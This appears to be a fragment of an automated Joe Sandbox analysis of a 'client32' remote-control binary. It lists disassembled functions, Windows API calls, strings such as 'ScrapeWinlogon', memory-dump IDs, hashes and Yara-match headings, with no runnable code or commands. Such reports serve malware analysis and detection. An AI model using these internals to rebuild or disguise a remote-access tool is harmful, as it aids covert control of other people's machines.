                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick
                                                        • String ID: Stop reconn to %s
                                                        • API String ID: 536389180-2663412807
                                                        • Opcode ID: 2abe557c952c5f7dcea216b9f0889483e10976acc780b42d0fe4d7d09327c2c3
                                                        • Instruction ID: af3c01e96c1c7020b4005c014dfc046fba5e2fca3df96dde9e75da5347296435
                                                        • Opcode Fuzzy Hash: 2abe557c952c5f7dcea216b9f0889483e10976acc780b42d0fe4d7d09327c2c3
                                                        • Instruction Fuzzy Hash: 3B31A475E006059FD7A0CF78C880A9AB7F5AF89314F1086ADE85EC7285DB71E944CB50
                                                        APIs
                                                        • _strtok.LIBCMT ref: 11037232
                                                          • Part of subcall function 11151A96: __getptd.LIBCMT ref: 11151AB4
                                                        • _strtok.LIBCMT ref: 110372B3
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strtok$ErrorExitLastMessageProcess__getptdwsprintf
                                                        • String ID: ; >$CLTCONN.CPP
                                                        • API String ID: 3120919156-788487980
                                                        • Opcode ID: 9165b0a18a4c59912c5dbe4835972a59b9c6cb766eae6eb5ab81999165ff3938
                                                        • Instruction ID: ccfc037b8357edf1224686589f5a8c743ae1842636507a1361757ab53c929d04
                                                        • Opcode Fuzzy Hash: 9165b0a18a4c59912c5dbe4835972a59b9c6cb766eae6eb5ab81999165ff3938
                                                        • Instruction Fuzzy Hash: A621E76AE006477FDB02DEA99C40B9EB7D59F84215F0840A5FD489B341FA74AD0083E1
                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 1104726D
                                                        • GetTickCount.KERNEL32 ref: 1104728F
                                                          • Part of subcall function 1103AE60: CloseHandle.KERNEL32(00000000,110AE050,00000001,00000000,?), ref: 1103AF02
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick$CloseHandle
                                                        • String ID: ScrapeWinlogon(false)$ScrapeWinlogon(true)
                                                        • API String ID: 3288320179-4162823169
                                                        • Opcode ID: 39545d518d5d5b217dad4cfacbfe5bf09837e8122a8fbefba39c119687804820
                                                        • Instruction ID: dad7b6f7502343be31355568bd77ad9becd5e116beabebea3ed844355e2a9eb8
                                                        • Opcode Fuzzy Hash: 39545d518d5d5b217dad4cfacbfe5bf09837e8122a8fbefba39c119687804820
                                                        • Instruction Fuzzy Hash: 7D213831F50B006BF612D73598867AAB7C5AF8071EF248439EE5B4A6C0CBA67480CB56
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _strtok
                                                        • String ID: ,=
                                                        • API String ID: 1675499619-2677018336
                                                        • Opcode ID: e4a83eb6bd879dd6f1f64293f5293dbff424d9e211f02fcaf1d7e2e2374799ee
                                                        • Instruction ID: 7a9fbb2f34e7303a29542f3709b992e29d429b122d26399c990661d45cd0e722
                                                        • Opcode Fuzzy Hash: e4a83eb6bd879dd6f1f64293f5293dbff424d9e211f02fcaf1d7e2e2374799ee
                                                        • Instruction Fuzzy Hash: BF110636B002562FE7C2DD788C10BC77BD59F09245F008098E948AB250E635E840C6B2
                                                        APIs
                                                          • Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D566
                                                          • Part of subcall function 1103D550: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D57C
                                                          • Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D584
                                                          • Part of subcall function 1103D550: Sleep.KERNEL32(00000014), ref: 1103D597
                                                          • Part of subcall function 1103D550: FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103D5A7
                                                          • Part of subcall function 1103D550: IsWindow.USER32(00000000), ref: 1103D5AF
                                                        • IsWindow.USER32(00000000), ref: 1103D5EA
                                                        • SendMessageA.USER32(00000000,0000004A,00000000,00000501), ref: 1103D5FD
                                                        Strings
                                                        • DoMMData - could not find %s window, xrefs: 1103D60D
                                                        • PCIVideoSlave32, xrefs: 1103D608
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Window$Find$MessageSendSleep
                                                        • String ID: DoMMData - could not find %s window$PCIVideoSlave32
                                                        • API String ID: 1010850397-3146847729
                                                        • Opcode ID: a02f1deb2413835855b986d31fe149332604edbd6b3a1203050ee6bfcc5d2bdb
                                                        • Instruction ID: 40260b62f694b88d247e0099ba96be85712fa175176470c9008f94ddf9255897
                                                        • Opcode Fuzzy Hash: a02f1deb2413835855b986d31fe149332604edbd6b3a1203050ee6bfcc5d2bdb
                                                        • Instruction Fuzzy Hash: BCF02773E512187BE700EF68BC06BDEBBA89B0130AF408194ED09A62C0F6B115114BD6
                                                        APIs
                                                          • Part of subcall function 11068B70: EnterCriticalSection.KERNEL32(?,82E0FB89,?,75A37CB0,75A37AA0), ref: 11068BD5
                                                          • Part of subcall function 11068B70: SetEvent.KERNEL32(?,?,00000000,11066D20,?,?), ref: 11068CB2
                                                        • CloseHandle.KERNEL32(00000000,00000001,000000C2,?,00000001,000000C1,?,00000001,000000C0,?,00000001,00000093,?,00000001,00000091,?), ref: 1108758A
                                                        • _free.LIBCMT ref: 110875AB
                                                        • CloseHandle.KERNEL32(?), ref: 110875E6
                                                        • FreeLibrary.KERNEL32(?), ref: 11087606
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseHandle$CriticalEnterEventFreeLibrarySection_free
                                                        • String ID:
                                                        • API String ID: 3241181375-0
                                                        • Opcode ID: 97f90a2b9532dc7094c0873dc976133b14c8770c73277285e597bf54c11473ca
                                                        • Instruction ID: 769b914857c95559ccedf9963c302cb6770c9c9862fadc681d98dd4b5afd4e1e
                                                        • Opcode Fuzzy Hash: 97f90a2b9532dc7094c0873dc976133b14c8770c73277285e597bf54c11473ca
                                                        • Instruction Fuzzy Hash: 3851BDF8B807057AF95596704CA6FBE214E8BD4B4CF041016FA066E1C2CED7BE829325
                                                        APIs
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • std::exception::exception.LIBCMT ref: 1113F7F7
                                                        • __CxxThrowException@8.LIBCMT ref: 1113F80C
                                                        • std::exception::exception.LIBCMT ref: 1113F81B
                                                        • __CxxThrowException@8.LIBCMT ref: 1113F830
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Exception@8Throwstd::exception::exception$_malloc_memsetwsprintf
                                                        • String ID:
                                                        • API String ID: 1651403513-0
                                                        • Opcode ID: 4754ce91abff75684998c44684bd62a387d3770bcf39efdefb3a8636f8b0d38b
                                                        • Instruction ID: 2aa7a213fe02530d6649da53b875432d464f8bc862cdc2c3c02bddd3af265e2f
                                                        • Opcode Fuzzy Hash: 4754ce91abff75684998c44684bd62a387d3770bcf39efdefb3a8636f8b0d38b
                                                        • Instruction Fuzzy Hash: F4514CB5900706AFC700CF9AC980A9AFBF8FF08714F50852EE55AA7740E774A654CF91
                                                        APIs
                                                        • EnterCriticalSection.KERNEL32(?,82E0FB89,?,?,?,?,82E0FB89,?,?,?,?,11170348,000000FF,?,110679FB,00000010), ref: 110632BA
                                                        • LeaveCriticalSection.KERNEL32(?), ref: 11063380
                                                          • Part of subcall function 111026C0: InterlockedDecrement.KERNEL32(?), ref: 111026C8
                                                        Strings
                                                        • EnumConn error, idata=%x, xrefs: 110633F6
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$DecrementEnterInterlockedLeave
                                                        • String ID: EnumConn error, idata=%x
                                                        • API String ID: 1807080765-705201588
                                                        • Opcode ID: b291daf73dcf3259c5623327772e4583ca1f3e03a8b6071e432c2e041ef0e574
                                                        • Instruction ID: aa17bf20ae77388aa0ec91c98647f03043a44d4666c3d031e6487ff34e196994
                                                        • Opcode Fuzzy Hash: b291daf73dcf3259c5623327772e4583ca1f3e03a8b6071e432c2e041ef0e574
                                                        • Instruction Fuzzy Hash: F551B075E087568FEB15CF55C580BAAF7F8FB45318F1086ADC85A8BB81CB31A805CB90
                                                        APIs
                                                          • Part of subcall function 11092F20: std::_Xinvalid_argument.LIBCPMT ref: 11092F40
                                                          • Part of subcall function 11092F20: _memmove.LIBCMT ref: 11092FC7
                                                          • Part of subcall function 11092F20: _memmove.LIBCMT ref: 11092FEB
                                                        • std::exception::exception.LIBCMT ref: 11093126
                                                          • Part of subcall function 11150C1A: std::exception::_Copy_str.LIBCMT ref: 11150C35
                                                        • __CxxThrowException@8.LIBCMT ref: 1109313B
                                                          • Part of subcall function 11151071: RaiseException.KERNEL32(?,?,11103644,?,?,?,?,?,11103644,?,111B83A0), ref: 111510B3
                                                          • Part of subcall function 11092F20: _memmove.LIBCMT ref: 11093025
                                                          • Part of subcall function 11092F20: _memmove.LIBCMT ref: 11093041
                                                        • std::exception::exception.LIBCMT ref: 110931C6
                                                        • __CxxThrowException@8.LIBCMT ref: 110931DB
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception$Copy_strExceptionRaiseXinvalid_argumentstd::_std::exception::_
                                                        • String ID:
                                                        • API String ID: 3482316527-0
                                                        • Opcode ID: 48381950686fee35f6dc86805a6ff2cf8b1dc353233030c430b72cf3119b753e
                                                        • Instruction ID: 34a656192ea29ff877c28e50c2c63445a0478e0dc2d9df183b14054e6d04c7b1
                                                        • Opcode Fuzzy Hash: 48381950686fee35f6dc86805a6ff2cf8b1dc353233030c430b72cf3119b753e
                                                        • Instruction Fuzzy Hash: 89319279A0470AEFD320DF64D850AABB3F9FB44704F104969E96A97641D770F904CBA2
                                                        APIs
                                                        • SetLastError.KERNEL32(00000057,03062EA0,00000001,00000000,00000000,75A45440,?,00000000,1112A233), ref: 110E1564
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        • m_plugin_table[pluginid] == NULL, xrefs: 110E1490
                                                        • NSSClientPlugin.cpp, xrefs: 110E148B
                                                        • InitPlugin(0x%08x, %d), xrefs: 110E1442
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$ExitMessageProcesswsprintf
                                                        • String ID: InitPlugin(0x%08x, %d)$NSSClientPlugin.cpp$m_plugin_table[pluginid] == NULL
                                                        • API String ID: 73808336-146751015
                                                        • Opcode ID: fdae3d6caeb60e4e86b8a54e0c4a4c1f33da6f1cecb8f821e4c4b66ddad970f7
                                                        • Instruction ID: ad6bb8f3b253fbe3b6a656bc4dae6ed0cb60087fd9fc08c2cee8f6ee06ca03d3
                                                        • Opcode Fuzzy Hash: fdae3d6caeb60e4e86b8a54e0c4a4c1f33da6f1cecb8f821e4c4b66ddad970f7
                                                        • Instruction Fuzzy Hash: 1A41A676E0625AAFDB11CB6A8C44BDEBBE4AF55754F044169EC0697380EA70DA0087E1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 534529e158e4db515927ccc196ef3b21eb4e7e2ebd5444ad79e5c81968efa83f
                                                        • Instruction ID: 755ba38bf884ac0eeaaa92c0afe6aec453c5cd012c1134b2337e0c48102fae43
                                                        • Opcode Fuzzy Hash: 534529e158e4db515927ccc196ef3b21eb4e7e2ebd5444ad79e5c81968efa83f
                                                        • Instruction Fuzzy Hash: FD410631A18A05EBDBD58FB5C9C065EFBB6AF82364F25852CD47597280EB70EA41CB40
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 111670EC
                                                        • __isleadbyte_l.LIBCMT ref: 1116711F
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,50036AD0,00BFBBEF,00000000,?,?,?,11167B23,00000109,00BFBBEF,00000003), ref: 11167150
                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,00000109,00000001,00BFBBEF,00000000,?,?,?,11167B23,00000109,00BFBBEF,00000003), ref: 111671BE
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 70553f7c7fafef29c21006f25f5c2dae4ac7e8c976c213a9198f9563594dea5c
                                                        • Instruction ID: a790c682b384103f3dc3b94a9d53280dae5bf4498d54a0adc54a3abaf1072143
                                                        • Opcode Fuzzy Hash: 70553f7c7fafef29c21006f25f5c2dae4ac7e8c976c213a9198f9563594dea5c
                                                        • Instruction Fuzzy Hash: 7931E531600656EFDB01DF64CD809ADBFBEBF02355F11896AE4608B191F7B2D960CB61
                                                        APIs
                                                        • Sleep.KERNEL32(000001F4,00000000,?,00000000,-111D903C), ref: 1103B2B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
